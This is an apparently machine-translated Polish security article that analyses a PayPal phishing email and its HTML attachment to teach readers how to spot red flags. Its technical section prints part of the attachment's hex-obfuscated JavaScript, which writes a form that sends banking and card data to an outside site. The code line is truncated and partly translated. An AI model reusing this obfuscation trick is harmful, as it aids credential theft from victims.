Główna » jak » Bezpieczeństwo online Rozbijając anatomię e-maili phishingowych

    Bezpieczeństwo online Rozbijając anatomię e-maili phishingowych


    W dzisiejszym świecie, w którym wszystkie informacje są dostępne online, phishing jest jednym z najpopularniejszych i najbardziej wyniszczających ataków online, ponieważ zawsze możesz wyczyścić wirusa, ale jeśli Twoje dane bankowe zostaną skradzione, masz kłopoty. Oto zestawienie jednego z takich ataków, które otrzymaliśmy.

    Nie myśl, że ważne są tylko twoje dane bankowe: w końcu, jeśli ktoś zyska kontrolę nad swoim loginem do konta, nie tylko zna informacje zawarte na tym koncie, ale szanse są takie same, że dane logowania mogą być używane na różnych innych konta. A jeśli naruszą twoje konto e-mail, mogą zresetować wszystkie inne hasła.

    Dlatego oprócz utrzymywania silnych i zmiennych haseł, musisz zawsze zwracać uwagę na fałszywe e-maile udające prawdziwą rzecz. Podczas gdy większość prób phishingu jest amatorska, niektóre są dość przekonujące, dlatego ważne jest, aby zrozumieć, jak rozpoznać je na poziomie powierzchni, a także jak działają pod maską.

    Obraz autorstwa asirap

    Badanie tego, co jest w zwykłym widoku

    Nasz przykładowy adres e-mail, podobnie jak większość prób wyłudzenia informacji, "powiadamia" Cię o aktywności na koncie PayPal, która w normalnych okolicznościach byłaby alarmująca. Tak więc wezwanie do działania polega na weryfikacji / przywróceniu konta poprzez przesłanie niemal każdej informacji osobistej, którą możesz wymyślić. Ponownie, jest to dość formuła.

    Chociaż z pewnością istnieją wyjątki, prawie każda wiadomość e-mail dotycząca phishingu i przekrętu jest ładowana czerwonymi flagami bezpośrednio w wiadomości. Nawet jeśli tekst jest przekonujący, zwykle można znaleźć wiele błędów zaśmieconych w treści wiadomości, które wskazują, że wiadomość nie jest prawidłowa.

    Ciało wiadomości

    Na pierwszy rzut oka jest to jeden z lepszych e-maili phishingowych, jakie widziałem. Nie ma błędów ortograficznych i gramatycznych, a słownictwo czyta się zgodnie z oczekiwaniami. Jest jednak kilka czerwonych flag, które możesz zobaczyć, gdy przyjrzysz się bliżej zawartości.

    • "Paypal" - Prawidłowy przypadek to "PayPal" (kapitał P). Możesz zobaczyć obie odmiany używane w wiadomości. Firmy są bardzo świadome pod względem marki, więc wątpliwe jest, aby coś takiego przeszło proces weryfikacji.
    • "Pozwól na ActiveX" - Ile razy widziałeś legalny internetowy biznes wielkości Paypal używający zastrzeżonego komponentu, który działa tylko w jednej przeglądarce, szczególnie gdy obsługuje wiele przeglądarek? Jasne, gdzieś tam jakaś firma to robi, ale to jest czerwona flaga.
    • "Bezpiecznie." - Zwróć uwagę, że słowo to nie jest wyrównane na marginesie z resztą tekstu akapitu. Nawet jeśli nieco rozciągnę okno, nie będzie ono prawidłowo zawijać ani spacji.
    • "Paypal!" - Przestrzeń przed wykrzyknikiem wygląda niezręcznie. Kolejne dziwactwo, które na pewno nie byłoby w prawdziwym e-mailu.
    • "PayPal-Konto Update Form.pdf.htm" - Dlaczego Paypal miałby załączyć "PDF", szczególnie, gdyby mógł po prostu link do strony na swojej stronie? Ponadto, dlaczego mieliby próbować ukryć plik HTML jako plik PDF? To jest największa czerwona flaga z nich wszystkich.

    Nagłówek wiadomości

    Kiedy spojrzysz na nagłówek wiadomości, pojawi się kilka dodatkowych czerwonych flag:

    • Adres z adresem to [email protected].
    • Brak adresu. Nie wyczyściłem tego, po prostu nie jest częścią standardowego nagłówka wiadomości. Zazwyczaj firma, która ma twoje imię, spersonalizuje e-mail.

    Załącznik

    Gdy otworzę załącznik, natychmiast zobaczysz, że układ jest nieprawidłowy, ponieważ brakuje informacji o stylu. Ponownie, dlaczego PayPal wysłałby formularz HTML, gdyby mógł po prostu podać link na swojej stronie?

    Uwaga: korzystaliśmy z wbudowanej przeglądarki załączników do Gmaila, ale zalecamy, aby NIE otwierać załączników od oszustów. Nigdy. Zawsze. Bardzo często zawierają exploity, które instalują trojany na komputerze w celu kradzieży informacji o koncie.

    Przewijamy nieco więcej, aby zobaczyć, że ten formularz wymaga nie tylko naszych danych logowania do systemu PayPal, ale także danych bankowych i kart kredytowych. Niektóre obrazy są zepsute.

    Oczywiste jest, że ta próba phishingu idzie za wszystkim jednym ruchem.

    Podział techniczny

    Chociaż powinno być całkiem jasne, biorąc pod uwagę to, co na pierwszy rzut oka jest próbą phishingu, teraz zamierzamy rozbić techniczny wygląd wiadomości e-mail i zobaczyć, co możemy znaleźć.

    Informacje z załącznika

    Pierwszą rzeczą, na którą należy spojrzeć, jest źródło HTML formularza załącznika, który przekazuje dane do fałszywej witryny.

    Podczas szybkiego przeglądania źródła wszystkie linki są prawidłowe, ponieważ wskazują na "paypal.com" lub "paypalobjects.com", które są zarówno zgodne.

    Teraz przyjrzymy się kilku podstawowym informacjom na stronie, które Firefox gromadzi na stronie.

    Jak widać, niektóre grafiki są pobierane z domen "blessedtobe.com", "goodhealthpharmacy.com" i "pic-upload.de" zamiast legalnych domen PayPal.

    Informacje z nagłówków wiadomości e-mail

    Następnie przyjrzymy się surowym nagłówkom wiadomości e-mail. Gmail udostępnia tę funkcję za pomocą opcji menu Pokaż oryginał w wiadomości.

    Patrząc na informacje w nagłówku oryginalnej wiadomości, możesz zobaczyć, że ta wiadomość została skompilowana przy użyciu programu Outlook Express 6. Wątpię, aby firma PayPal miała kogoś z personelu, który wysyła te wiadomości ręcznie przez przestarzałego klienta poczty e-mail.

    Patrząc na informacje o trasie, możemy zobaczyć adres IP zarówno nadawcy, jak i serwera poczty przychodzącej.

    Adres IP użytkownika jest oryginalnym nadawcą. Wykonując szybkie wyszukiwanie informacji o IP, możemy zauważyć, że wysyłający adres IP znajduje się w Niemczech.

    A kiedy patrzymy na serwer poczty przekazującej (mail.itak.at), adres IP widzimy, że jest to dostawca usług internetowych z siedzibą w Austrii. Wątpię, aby system PayPal wysyłał wiadomości e-mail bezpośrednio przez dostawcę usług internetowych z Austrii, gdy mają one potężną farmę serwerów, która mogłaby z łatwością obsłużyć to zadanie.

    Gdzie się dzieje dane?

    Wyraźnie stwierdziliśmy, że jest to phishingowy e-mail i zgromadziliśmy informacje o tym, skąd pochodzi wiadomość, ale co z tym, gdzie wysyłane są Twoje dane?

    Aby to zobaczyć, musimy najpierw zapisać załącznik HTM do naszego pulpitu i otworzyć go w edytorze tekstu. Przewijanie, wszystko wydaje się być w porządku, chyba że dojdziemy do podejrzanie wyglądającego bloku JavaScript.

    Przełamując pełne źródło ostatniego bloku Javascript, widzimy:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f7374222061637466f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; dla (i = 0;

    Za każdym razem, gdy widzisz duży pomieszany ciąg pozornie przypadkowych liter i cyfr osadzonych w bloku JavaScript, zwykle jest to coś podejrzanego. Patrząc na kod, zmienna "x" jest ustawiona na ten duży ciąg, a następnie dekodowana do zmiennej "y". Końcowy wynik zmiennej "y" jest następnie zapisywany w dokumencie jako HTML.

    Ponieważ duży ciąg składa się z cyfr 0-9 i liter a-f, najprawdopodobniej jest kodowany przez prostą konwersję ASCII na Hex:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Przetłumaczyć na:

    To nie przypadek, że dekoduje się do prawidłowego znacznika formularza HTML, który wysyła wyniki nie do PayPal, ale do fałszywej strony.

    Dodatkowo, gdy zobaczysz źródło HTML formularza, zobaczysz, że ten tag formularza nie jest widoczny, ponieważ jest generowany dynamicznie przez JavaScript. Jest to sprytny sposób na ukrycie tego, co faktycznie robi HTML, jeśli ktoś po prostu wyświetli wygenerowane źródło załącznika (tak jak to zrobiliśmy wcześniej) w przeciwieństwie do otwierania załącznika bezpośrednio w edytorze tekstu.

    Po uruchomieniu szybkiego whois na obraźliwej stronie możemy zauważyć, że jest to domena hostowana na popularnym hoście internetowym 1and1.

    Co wyróżnia to, że domena używa czytelnej nazwy (w przeciwieństwie do czegoś takiego jak "dfh3sjhskjhw.net"), a domena została zarejestrowana przez 4 lata. Z tego powodu uważam, że ta domena została porwana i wykorzystana jako pionek w tej próbie phishingu.

    Cynizm jest dobrą obroną

    Jeśli chodzi o bezpieczeństwo w Internecie, nigdy nie boli Cię dobry cynizm.

    Chociaż jestem pewien, że w przykładowym e-mailu jest więcej czerwonych flag, to, co wskazaliśmy powyżej, to wskaźniki, które widzieliśmy po zaledwie kilku minutach badania. Hipotetycznie, jeśli poziom powierzchni wiadomości e-mail naśladował jej prawowitego odpowiednika w 100%, analiza techniczna nadal ujawniałaby jego prawdziwy charakter. Właśnie dlatego jest importowany, aby móc badać zarówno to, co możesz, a czego nie możesz zobaczyć.